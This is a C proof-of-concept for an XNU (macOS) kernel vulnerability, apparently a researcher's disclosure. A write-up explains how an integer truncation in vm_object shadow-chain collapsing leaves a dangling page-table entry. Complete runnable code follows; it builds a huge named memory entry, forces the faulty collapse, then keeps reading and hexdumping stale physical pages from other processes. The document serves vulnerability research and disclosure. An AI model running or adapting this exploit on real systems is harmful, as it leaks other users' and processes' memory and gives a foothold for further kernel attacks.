// @i41nbeer
#if 0
XNU dangling PTE entry due to integer truncation when collapsing vm_object shadow chains

XNU uses shadow chains as part of the implementation of copy-on-write semantics.

A vm_object with its shadow field set "shadows" a lower backing object; any pages not
resident in the upper level object might be resident somewhere lower down the shadow chain.

vm_object_collapse implements an optimization where these shadow chains can,
under certain circumstances, be collapsed.

It implements two strategies:

1) If an upper-level vm_object shadows a lower vm_object which only has a single reference
then the lower vm_object can be "pulled-up" in to the upper object.

2) If an upper-level vm_object already has resident pages which completely cover the range
provided by the shadow object, then the shadow object can be bypassed (skipped over.)

Here's the code in vm_object.c which tries to check whether the lower-level backing_object
can be bypassed:

		/*
		 *	If the object doesn't have all its pages present,
		 *	we have to make sure no pages in the backing object
		 *	"show through" before bypassing it.
		 */
		size = (unsigned int)atop(object->vo_size);
		rcount = object->resident_page_count;

		if (rcount != size) {

The vulnerability is that with some tricks you can create a single vm_object with an
extremely large vo_size such that the cast of the result of atop truncates the object
size in pages. This leads to the bypass optimization being applied incorrectly and
the backing_object vm_object being released even though pages might be pmapped.

** Creating a very large vm_object **

Just calling mach_vm_allocate won't work as there's a CHUNK_SIZE limit for anonymous 
allocations.

mach_make_memory_entry_64 with the MAP_MEM_NAMED_CREATE flag also won't work as it enforces
a 4GB limit.

There's another slightly more obscure MIG method though: mach_memory_object_memory_entry_64

I guess that this is a relic of userspace pagers and I'm not sure if this API is used at all?

I'm pretty sure you can't pass a pager to it but if you call it like this:

mach_memory_object_memory_entry_64(
  mach_host_self(),
  1,
  0x400000000000,
  VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE,
  MACH_PORT_NULL,
  &named_port);

you reach a call to vm_object_allocate with that very large size passed directly to vm_object_allocate().

This gives us a named_entry port with a very large vm_object.

The first step is to map this object and read from a page; this causes a vm_page to be allocated
and added to the vm_object's memq queue of resident pages.

Then we unmap that object (but the page stays in the resident pages list.)

Then we map the object again via mach_vm_map but this time specify copy=1 causing the creation of
a shadow (to resolve the COW) and that shadow object getting mapped.

We then read again from the first page of the mapped copy. The fault handler will traverse the shadow
chain and find the page allocated earlier. Since this is only a *read* that page *won't* get copied,
instead a PTE will be entered into the page tables to point to the page which is resident
in the named_entry. Important to emphasize here is that this page isn't resident in the shadow
object - that would only be the case if we had written to the page.

We then trigger a collapse of the shadow chain; there's no API to do this but there's a trick
to force it:

Map a small (but not tiny) COW copy of a portion of the object you want to collapse
then try to VM_ALLOC_FIXED a single page directly after that - the VM code wants to try coalesce this
new anonymous page with the object which directly preceeds it if it is also anonymous and to
do that it first needs to collapse it.

When that collapse operation is triggered we reach the bug:

		size = (unsigned int)atop(object->vo_size);
		rcount = object->resident_page_count;
    if (rcount != size) {

object->vo_size is 0x400000000000 which when right shifted by PAGE_SIZE on both ARM64 and Intel and then
cast to a 32-bit value is 0. Since the shadow object doesn't have any resident pages (and therefore
rcount == size) this causes the collapse code to incorrectly believe that backing_object is not actually
providing any pages visible through this shadow object, and that it can be deallocated.

This is of course not correct - we have in fact got a mapping of one of those pages!

By then also destroying the named_entry port (and deallocating the COW copy made to force the collapse)
we can cause the backing_object to be freed and its pages to be released. The system believes
that those pages cannot be mapped so they are not pmap-disconnected again (since if everything was correct
they must already have been pmap-disconnected.)

This simple proof-of-concept then just tries repeatedly to read through the dangling PTE, eventually
printing lots of stale data from other tasks. (Run it a few times with some system load... also you have
to press enter a lot as it's written so that I can follow along with the kernel debugger.)

Actually writing through this PTE would require some more tricks but apart from using this bug to
leak a lot of interesting data I'm pretty sure you can use it as a COW bypass for the various other
optimizations which rely on COW working correctly - but this PoC just tries to print out some stuff.

NOTES:
This proof-of-concept is only tested on an Intel system; primarily because it would have been basically
impossible to figure all this out without the kernel debugger which is not that useful on M1/M2...

The PoC makes a *lot* of assumptions about page size and it definitely won't just work on ARM!

It has been tested on MacBook Pro 13-inch, 2017 with 16GB of RAM running 12.5 (21G72)

#endif

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <math.h>
 
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/mach_host.h>

void hexdump_page(void* buf) {
  uint8_t* b = buf;
  int n_cols = 16;
  for (int line = 0; line < (0x1000/n_cols); line++) {
    for (int col = 0; col < n_cols; col++) {
      uint8_t val = *b++;
      printf("%02x ", val);
      if (val > '!' && val < '~') {
        printf("%c ", val);
      } else {
        printf("_ ");
      } 
    }
    printf("\n");
  }
}

void key() {
  size_t len = 0;
  fgetln(stdin, &len);
}

void check(kern_return_t merr) {
  if (merr != KERN_SUCCESS) {
    printf("failed: 0x%x - %s", merr, mach_error_string(merr));
  } else {
    printf("success!\n");
  }
}

void touch(mach_vm_address_t addr) {
  *((volatile char*)(addr)) = 'A';
}

char force_read(mach_vm_address_t addr) {
  volatile char val = *((volatile char*)(addr));
  return val;
}

int main(int argc, char** argv) {
  kern_return_t merr;

  int n_target_pages = 1000;

  pid_t pid = getpid();
  printf("pid: %d\n", pid);

  key();
  
  ////////////////////////

  mach_port_t named_port = MACH_PORT_NULL;

  merr = mach_memory_object_memory_entry_64(
                        mach_host_self(),
                        1,
                        0x400000000000,
                        VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE,
                        MACH_PORT_NULL,
                        &named_port);

  if (merr != KERN_SUCCESS) {
    printf("failed: 0x%x - %s", merr, mach_error_string(merr));
  } else {
    printf("success!\n");
  }

  printf("port: 0x%x\n", named_port);

  key();


  // want a page in the actual object itself:


  mach_vm_address_t obj_addr = 0;
  mach_vm_size_t map_size = 0x400000000000;

  merr = mach_vm_map(mach_task_self(),
                     &obj_addr,
                     map_size,
                     0, // mask
                     VM_FLAGS_ANYWHERE,
                     named_port,
                     0,
                     0, // copy
                     VM_PROT_READ | VM_PROT_WRITE,
                     VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE, // */VM_PROT_READ | VM_PROT_WRITE ,
                     VM_INHERIT_NONE); // inheritance


  printf("about to force a read\n");
  printf("that should give us a page in the lowest level object?\n");
  for (int i = 0; i < n_target_pages; i++) {
    force_read(obj_addr+(0x1000+i));
  }
  key();

  // unmap it:
  merr = mach_vm_deallocate(mach_task_self(),
                            obj_addr,
                            map_size);

  // map a copy of it:

  printf("trying to map the copy with prot_exec in max\n");

  merr = mach_vm_map(mach_task_self(),
                     &obj_addr,
                     map_size,
                     0, // mask
                     VM_FLAGS_ANYWHERE,
                     named_port,
                     0,
                     1, // copy
                     VM_PROT_READ | VM_PROT_WRITE,
                     VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE, // */VM_PROT_READ | VM_PROT_WRITE ,
                     VM_INHERIT_NONE); // inheritance

  if (merr != KERN_SUCCESS) {
    printf("failed: 0x%x - %s", merr, mach_error_string(merr));
  } else {
    printf("success!\n");
  }

  key();


  // now do an actual read through the shadow (*not* a write!!)
  // we don't want a resident page in the copy object; just a PTE which should go via the shadow

  printf("about to force a read\n");
  for (int i = 0; i < n_target_pages; i++) {
    force_read(obj_addr+(0x1000+i));
  }
  key();

  // collapse
  // we can't force a collapse directly on the huge mapping because of chunk limits;
  // go one level higher with a small read:
  // (but not *so* small that it's just a physical copy!)

  mach_vm_address_t end_addr = obj_addr + map_size;

  mach_vm_address_t copy_addr = 0;
  mach_vm_size_t copy_size = 20*0x1000;

  merr = mach_vm_read(mach_task_self(),
                      end_addr-copy_size,
                      copy_size,
                      &copy_addr,
                      &copy_size);
  
  check(merr);
  printf("made a COW copy of the first part of the copy here: 0x%llx\n", copy_addr);
  key();

  printf("trying to vm_allocate at the end which should force the call to try colaesce\n");

  
  mach_vm_address_t copy_end_addr = copy_addr + copy_size;
  mach_vm_size_t coalesce_size = 0x1000;

  merr = mach_vm_allocate(mach_task_self(),
                          &copy_end_addr,
                          coalesce_size,
                          VM_FLAGS_FIXED);
  check(merr);
  printf("tried collapse\n");
  key();

  merr = mach_vm_deallocate(mach_task_self(),
                            copy_addr,
                            copy_size);

  check(merr);

  merr = mach_vm_deallocate(mach_task_self(),
                            copy_end_addr, coalesce_size);

  mach_port_deallocate(mach_task_self(), named_port);

  #if 0
  volatile char old_ch = force_read(obj_addr);  
  while(1) {
    volatile char ch = force_read(obj_addr);
    if (ch != old_ch) {
      printf("first byte changed: %02x\n", ch);
      hexdump_page((void*)obj_addr);
      old_ch = ch;
    }
  }
  #endif

  while(1) {
    for (int i = 0; i < n_target_pages; i++) {
      volatile char ch = force_read(obj_addr+(0x1000+i));
      if (ch != 0) {
        hexdump_page((void*)obj_addr+(0x1000+i));
      }
    }
    printf("sleeping then trying again\n");
    sleep(1);
  }

  return 0;
}

